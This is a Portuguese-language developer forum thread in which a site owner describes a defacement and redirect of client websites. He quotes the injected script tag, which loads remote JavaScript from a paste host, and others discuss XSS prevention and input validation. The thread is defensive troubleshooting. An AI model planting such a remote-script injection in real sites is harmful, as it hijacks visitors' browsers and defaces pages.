Publicado em 6 de mar.

Problemas de Redirecionamento

Olá amigos, estou com um problema bem chatinho, hoje a noite percebi que 2 sites de cleintes meus foram, "Hackeados" por um bando de desocupados, que mantém essa pagina

https://www.facebook.com/4ng3lzTEAM/

Fiz um Up do back dos sites, mas não resolveu, e analisando a ME$#%$ que eles fizeram, percebe-se que o ataque apenas redireciona a pagina inicial pra uma pagina que eles fizeram, so que qualquer alteração no link adicionar ou remover letras leva ao site normalmente, a a base de dados esta intacta, basicamente eles apenas afeta as home pages.

alguem tem ideia de como resolver isso?

sistes

http://www.iespenet.com.br

Não sei se postei certo, mas espero ajuda, obrigado

Discussão (5)

Entre ou cadastre-se para participar da discussão

Entrar Criar conta

icarof· 6 de mar.

Olá amigos

descobri como se deu a invasão, ele conseguiram infiltrar esse codigo no BD

<script src="[http://paste.c99.nl/8179cefc0de8c5fde59f.js">](http://paste.c99.nl/8179cefc0de8c5fde59f.js)

 

<p><script src="[http://paste.c99.nl/8179cefc0de8c5fde59f.js">

](http://paste.c99.nl/8179cefc0de8c5fde59f.js)

eles colocaram na tabela de noticias, alguém sabe como posso me prevenir desses caras?

gabrieldarezzo· 6 de mar.

Caramba o Facebook dos caras tem varias pages.

Sobre o seu problema/prevenção.

Como você trata as 'entradas' no seu site?

Qualquer entrada de informação do seu site é necessário validar.

Ex: Em um campo texto você espera um texto é necessário validar o mesmo para entrar somente texto e não uma 'tag' "<script ...""

Busca um pouco sobre Script Injection, assim você tem uma noção sobre se defender deste tipo de ataque pois acredito que foi isso que rolou contigo.

http://stackoverflow.com/questions/1205889/how-to-prevent-code-injection-attacks-in-php

Abraços.

icarof· 6 de mar.

Mano, ainda não sei como eles eles fizeram, todas a consultadas e variáveis são tratadas antes de receber os dados, tipo, os formularios de login passam por validação antes para evitar campos vazios e o login não é feito com user e senha, mas com chaves de acesso geradas a partir deles.

nas consultas via POST e GET, passo apenas id, e me certifico de receber apenas numeros.

vou dar uma olhada nessa dica, vlw

ESerra· 6 de mar.

O seu cliente precisa guardar JS no banco? Se não precisar, trate isto, pois se trata de XSS...

icarof· 1 de mai.

Foi isso ESerra, não especifiquei a como apenas inteiro a variável que faz a consulta das IDs, e cometi o erro de deixar que o o formulário de login aceite campos em branco antes da validação.

mas ja resolvi. obrigado